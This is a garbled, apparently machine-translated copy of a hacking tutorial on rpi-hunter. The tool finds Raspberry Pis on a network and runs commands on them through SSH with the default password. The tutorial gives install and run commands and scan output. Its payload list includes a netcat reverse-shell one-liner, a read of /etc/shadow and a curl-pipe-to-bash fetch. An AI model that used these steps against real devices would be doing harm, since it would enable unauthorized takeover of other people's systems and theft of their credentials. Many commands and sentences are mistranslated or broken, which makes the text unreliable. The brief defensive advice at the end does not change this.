قالب وردپرس درنا توس
Home / Tips and Tricks / How to discover and attack Raspberry Pis Using standard information with Rpi hunters «Zero Byte :: WonderHowTo

How to discover and attack Raspberry Pis Using standard information with Rpi hunters «Zero Byte :: WonderHowTo



When creating a Raspberry Pi, it is easy to overlook changing the default password. Like many IoT devices, Raspberry Pi's standard Raspbian operating system is installed with a commonly known standard password, making the device vulnerable to remote access. Using a tool called rpi-hunter, hackers can detect, access, and release custom payloads on any weak Pi connected to the same network.

Although this tool is mainly available for local networks, it can also detect and attack Pi models that are connected directly to the internet anywhere. Far from a simple prank, a vulnerable Pi on your network can give hackers unauthorized access to other devices on your internal network ̵

1; and even spread payloads to other vulnerable devices.

Why common references are a problem

Devices that still use standard passwords are a major risk of connecting to a network. Because many IoT devices do not even allow the device owner to change the password thanks to hard-coded data, they are a favorite target for hackers and automated botnets. Hackers exploited these deficiencies in October 2016 and took out Internet service in the United States with thousands of vulnerable computers connected in the Mirai botnet.

This botnet was created by scanning large blocks of internet for open telnet ports and trying to log in with standard passwords to any device it discovered, taking over vulnerable devices and adding them to the botnet master.

Apart from IoT devices, standard tasks are also significant problems in routers. Because most users hook up the device and never change the password to it, anyone with the Wi-Fi password can quickly access the router's setup and administrative portal. From here, it is easy to configure remote administration, load unauthorized firmware to spy on the owner, and make other unauthorized changes to the device such as pointing the DNS server to a malicious one.

If you know the default password is a device used, it will be easy to automate the login to the device to perform any kind of action. That's where rpi hunter comes in. With this, we can use our knowledge of the Raspberry Pi standard password to automate and control Pi remotely.

Rpi hunters too good

If you have more than one raspberry Pi, rpi hunters can take the job out to keep them updated. Once you have found Pis on the network, it is easy to make changes to each device individually or to access each Pi at the same time as a group. While rpi-hunter is programmed by default to try standard Raspbian passwords, you can easily change the password to reflect those you used to create your own Raspberry Pis.

If you have a home or work network with the Raspberry Pis you need to configure, you can connect them to the network, enable SSH and make any changes you need for the entire group as one with rpi-hunter. You can run updates, change passwords or pre-program software on PIS, you may need everyone to run later. The ability to connect all your Pis to the network and issue commands to them all at the same time is much more convenient than having to do it one by one.

Rpi-Hunter for Evil

It doesn't take much imagination to guess how you can use the ability to detect and control large groups of raspberry pis with standard tasks. Aside from stock Raspbian, many Raspberry Pis are pressed as OctoPrint controls or other applications with well-known standard passwords. If any of these devices are connected directly to the internet, rpi-hunter can detect them over the internet and start issuing commands.

The risk of forgetting to change your password for the owner of a Raspberry Pi is to allow a stranger to control it remotely and potentially get a beachhead to further infect your network. The average user who sets up and forgets about a Raspberry Pi running standard tasks can never see the symptoms of the device being damaged, although it may be silent to follow instructions such as directing stolen credit card transactions through your network or spying on your traffic. [19659003] What You Need

To follow this guide, must have a Raspberry Pi model like Zero W or 3 Model B + running Raspbian or Debian. You should be able to download this operating system for Raspberry Pi from the Pi Foundation download page. When you have your Raspberry Raspberry Pi, you can connect it to your home network with an Ethernet cable (if Pi has an Ethernet port) or Wi-Fi.

Next you need a computer with Python to run rpi-hunter on. Because Python is a platform platform, you should be able to install it from its download page on the operating system you are using.

Shop for Raspberry Pi models on Amazon

Once you have installed Python and your computer is connected to the same network your Raspberry Pi is connected to, then you are ready to start using rpi-hunters.

Step 1: Get Rpi-Hunter Ready

First, we need to install some libraries rpi-hunter rely on run. To do so, open a new terminal window and enter the following commands.

  sudo pip install -u argparse termcolor
sudo apt -y install arp-scan tshark sshpass 

Once these libraries have been installed, we can continue installing rpi-hunters from the GitHub repository. To clone the repo, you can write the following in a terminal window.

  git cloned https://github.com/BusesCanFly/rpi-hunter.git
cd rpi-hunter 

Now we should be in the "rpi-hunter" folder (via the command cd with the newly downloaded "rpi-hunter.py" ready for us to run. 19659025] Step 2 : Activate SSH on your Raspberry Pi

Connect your Raspberry Pi to the network either via Ethernet cable or Wi-Fi, and make sure SSH is enabled. You can check this by running the command raspi-config in a terminal window, select "Interfacing Options" and then enable remote command line access to your Pi with SSH.

Once you have activated SSH, save your options. You may need to restart. if SSH is run by typing ifconfig to get your IP address in a terminal window on Pi and then run the following command on your other device.

  sudo nmap -p 22 (pi & p's IP address here) 

If the Nmap scan indicates that the port is "open", SSH p to your Pi.

Step 3: Installing the Rpi Hunter on Your Raspberry Pi

Before running the first time, we must run "rpi-hunter.py" by running the following command in a terminal window.

  chmod + x rpi-hunter.py 

Step 4: Run Rpi-hunter

Now we should be able to run the program and see the different flags we can work with.

  sudo python rpi-hunter.py -h 
  use: rpi-hunter.py [19659038] optional argument:
-h, - help Show this help message and exit
- list List avalible payload
--no scan Disable ARP scanning
-r IP_RANGE IP interval to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-c CREDS Password to be used when ssh & gs
- Payroll amount (Name of, or raw) Load load [ex. reverse_shell or 'whoami']
-H HOST (If you are using reverse_shell payload) reverse shell host
-P PORT (If using reverse payload) Reverse shell port
--Safe Print the sshpass command, but do not run it
-q Do not print banner or ARP scan output 

Here we can see some useful flags from the bat. We can scan a single unit with -r or a series of IP addresses, or we can even draw from a list of IP addresses with the flag -f . There are some other options regarding which payload we should choose, and we can explore available payloads by typing the following command.

  sudo python rpi-hunter.py --list 
  █████ █╗ ██████╗ ██╗ ██╗ ██╗██╗ ██╗███ ██ ╗█████████████████████████████████████████████████ ██ ████╗
██║ ██║██║ ██║███████║═══██╔═══██ ╔════╝██╔══██╗
LayDisplayed ██║ ██ ║ █████╗ █████╔═
██║══════███╔══██║██║ ██║██║██████║ █ ║ ██╔═══ ██╔══██╗
██║ ██║██║ ██║ ██║ ██║█═██████╔████ ██ █████████████████ ║ ██║
═ ══════ ═══ ═══ ═══ ═══════ ═══ ═════ ═══ ═══════════ ═══
-------------------------------------------------- ---------------------------
BussarCanFly 76 32 2e 30
-------------------------------------------------- ---------------------------

Payloads:
Enter with - payment name

[raincow_install] sudo apt -y install fortune cowsay lolcat
[motd] echo "CHANGE YOUR PASSWORD"> / etc / motd
[raincow_bashrc] sudo echo "fortune | cowsay | lolcat" >> ~ / .bashrc
Rm / tmp / f; mkfifo / tmp / f; cat / tmp / f | / bin / sh -i 2> & 1 | nc None None> / tmp / fC
[apt_update] sudo apt update && sudo apt -y upgrade
[shadow] sudoku / etc / shadow
[rickroll] curl -s -L http://bit.ly/10hA8iC | bash
[gitpip] sudo apt -y install git python-pip 

In the payload list, we can see that there are several options to choose from. We can change today's message, create a reverse shell to remotely control Pi, or even customize our own payload to send.

Step 5: Discover the Raspberry Pis on the Network

Discover a Raspberry Pi on the network, rpi-hunter will run a series of scans to identify which device is listed as manufactured by Raspberry Pi. We can run a scan first and instantly add the IP address here if we want to be precise, but the point here can detect and control the devices on the network that you otherwise don't know about.

Without knowing anything If the network we are on, rpi-hunter will scan the entire network area for Raspberry Pi devices, add them to a list, and then send a payload to any device that runs standard tasks. We can do this with whoami payload with the following command. I have run mine without first connecting Pi to the network. (Note: You can also scan a specific IP area by inserting the -r flag and the interval before the payload.)

  sudo python rpi-hunter.py --payload whoami 
  ██ ██ █████████████████ █████████████████ $ ╗ ╗ ██████╗
██║ ██║██║ ██║███████║═══██╔═══██ ╔════╝██╔══██╗
LayDisplayed ██║ ██ ║ █████╗ █████╔═
██║══════███╔══██║██║ ██║██║██████║ █ ║ ██╔═══ ██╔══██╗
██║ ██║██║ ██║ ██║ ██║█═██████╔████ ██ █████████████████ ║ ██║
═ ══════ ═══ ═══ ═══ ═══════ ═══ ═════ ═══ ═══════════ ═══
-------------------------------------------------- ---------------------------
BussarCanFly 76 32 2e 30
-------------------------------------------------- ---------------------------

Interface: wlp1s0, data link type: EN10MB (Ethernet)
Launches arp scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.42.1 de: f3: 86: ec: ca: a0 (unknown)
172.16.42.3 60: 30: d4: 6a: 06: c8 (unknown)
172.16.42.27 b0: 19: c6: 98: 72: ee (unknown)
172.16.42.24 1c: 36: bb: 00: bd: 84 (unknown)
172.16.42.85 8c: 85: 90: 3a: 77: 14 (unknown)
172.16.42.15 30: 59: b7: 08: b2: 86 Microsoft
172.16.42.102 8c: 85: 90: c4: 45: 08 (unknown)
172.16.42.117 00: 26: bb: 1b: 97: 72 Apple, Inc.
172.16.42.121 8c: 85: 90: 0c: a6: e6 (unknown)
172.16.42.138 18: 65: 90: e0: 3e: 03 (unknown)
172.16.42.122 d0: c5: f3: 9a: eb: 2b (unknown)
172.16.42.35 10: 4a: 7d: 39: ea: e0 Intel Corporate
172.16.42.75 40: 4e: 36: 3b: 63: bf HTC Corporation
172.16.42.80 34: 23: 87: e4: 41 Hon Hai Precision Ind. Co., Ltd.
172.16.42.95 3c: 2nd: f9: bb: 87: ad (unknown)
172.16.42.105 88: e9: fe: 87: c7: 74 (unknown)
172.16.42.112 c4: b3: 01: bc: ab: e7 Apple, Inc.
172.16.42.115 36: 26: 1f: e8: 1f: 63 (Unknown)
172.16.42.169 a8: bb: cf: 13: 42: 6th Apple, Inc.
172.16.42.179 8c: 85: 90: 81: 9a: 9b (unknown)
172.16.42.141 8c: 85: 90: c3: var: 3e (unknown)
172.16.42.123 a4: 34: d9: 3f: b3: 30 Intel Corporate
172.16.42.164 b8: e8: 56: 12: 84: 36 Apple, Inc.

23 packets received by filter, 0 packets dropped by kernel
Final arp-scan 1.9.5: 256 hosts scanned for 2,571 seconds (99.57 hosts / sec). 23 replied

Located 0 Raspi s

Charged 0 IPs

Sends payload to Pi
Godspeed, little payload 

As you can see from the production, there was zero Raspberry Pis detected on the network we are present on. If there was one, we should see a response from the Raspberry Pi that just says "pi" in response to the whoami command.

Step 6: Send a standard payload

Now, let's continue and send one of the standard loads included in the script to a live Raspberry Pi. Let us use motd payload, which will change Pis "Today's message" that appears when a user logs in through SSH. (Note: If you already have a Pi you want to target, insert the -r flag and its IP address before the payload.)

When we run this, the script will be connected to all Pi we have detected via SSH with standard information, and then add "REPLACE YOUR PASSWORD" to the text of the logon screen message for day.

  sudo python rpi-hunter.py --payload motd 
  ██╗ █████╗ ██╗ ██╗ ██╗██╗ ██╗███ ██ ╗███████████ways █████╗
██║ ██║██║ ██║███████║═══██╔═══██ ╔════╝██╔══██╗
LayDisplayed ██║ ██ ║ █████╗ █████╔═
██║══════███╔══██║██║ ██║██║██████║ █ ║ ██╔═══ ██╔══██╗
██║ ██║██║ ██║ ██║ ██║█═██████╔████ ██ █████████████████ ║ ██║
═ ══════ ═══ ═══ ═══ ═══════ ═══ ═════ ═══ ═══════════ ═══
-------------------------------------------------- ---------------------------
BussarCanFly 76 32 2e 30
-------------------------------------------------- ---------------------------

Interface: wlp1s0, data link type: EN10MB (Ethernet)
Launches arp scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.42.1 de: f3: 86: ec: ca: a0 (unknown)
172.16.42.15 30: 59: b7: 08: b2: 86 Microsoft
172.16.42.24 1c: 36: bb: 00: bd: 84 (unknown)
172.16.42.48 b4: 9c: df: c1: 27: 5d (unknown)
172.16.42.85 8c: 85: 90: 3a: 77: 14 (unknown)
172.16.42.75 40: 4e: 36: 3b: 63: bf HTC Corporation
172.16.42.80 34: 23: 87: e4: 41 Hon Hai Precision Ind. Co., Ltd.
172.16.42.169 a8: bb: cf: 13: 42: 6th Apple, Inc.
172.16.42.121 8c: 85: 90: 0c: a6: e6 (unknown)
172.16.42.182 f4: 5c: 89: 99: 57: 13 Apple, Inc.
172.16.42.102 8c: 85: 90: c4: 45: 08 (unknown)
172.16.42.97 a4: b8: 05: 66: a0: 64 Apple, Inc.
172.16.42.122 d0: c5: f3: 9a: eb: 2b (unknown)
172.16.42.130 90: 61: ae: 8f: f4: 03 (unknown)
172.16.42.127 4c: 66: 41: 77: 66: 37 SAMSUNG ELECTRO-MECHANICS (THAILAND)
172.16.42.98 78: 4f: 43: 59: 7b: fb Raspberry Pi
172.16.42.112 c4: b3: 01: bc: ab: e7 Apple, Inc.

21 packets received by filter, 0 packets dropped by kernel
Closing arp scan 1.9.5: 256 hosts scanned for 2,538 seconds (100.87 hosts / sec). 17 replied

Located 1 Raspi s

Charged 1 IP

Sends payload to Pi
Godspeed, little payload

Sends payload to 172.16.42.98 

Success! The next time we log into our Raspberry Pi via SSH, we should see the message "REPLACE YOUR PASSWORD" added.

Step 7: Send a custom payload

Now that we can send payloads, let's go beyond the standard payload contained in the script and use a simple custom payload. To do this we can attach some commands that we want to send Pi in quotation marks after the flag – payload . To restart each Pi we discover, we can send the command sudo reboot as our payload. This command looks like this:

  sudo python rpi-hunter.py --payload "sudo reboot" 
  Located 1 Raspi s

Charged 1 IP

Sends payload to Pi
Godspeed, little payload

Sends payload to 172.16.42.98
Connection to 172.16.42.98 closed by remote hosts. 

After issuing this command, each Raspberry Pi on the network should be restarted immediately. If any Pis uses a different password than the standard Raspbian-Raspbian password, you can change the password Rpi-Hunter attempt with the -c flag.

Access to Pis with a different password than the default can be done by running the following command in a terminal window, with Pi's password added where "toor" is.

  sudo python rpi-hunter.py -c toor -payload "sudo reboot" 

Now that you can change both the password sent and customize your payload, rpi-hunter is ready to control all Pi or groups of Pis on distance.

Rpi hunters allow you to control many pisses at once

Devices with standard credentials are easily accessible and rpi-hunter is a powerful and useful concept to show how easy it is to take over a large number of vulnerable units simultaneously. Be sure to change the default password on any device that you connect to your network, and never reveal standard Internet-enabled devices.

If you are worried that someone else will access your Raspberry Pi, turn off SSH when you do not need it and consider using a key file rather than a simple password phrase to secure SSH access on your device.

I hope you got this guide to find and print payloads to Raspberry Pis over a network of rpi hunters! If you have any questions about this remote access guide to Raspberry Pis, leave a comment below and feel free to contact me on Twitter @ KodyKinzie .

Don't miss: Starting Multiple Operating Systems Raspberry Pi with BerryBoot

Cover image of Kody / Null Byte




Source link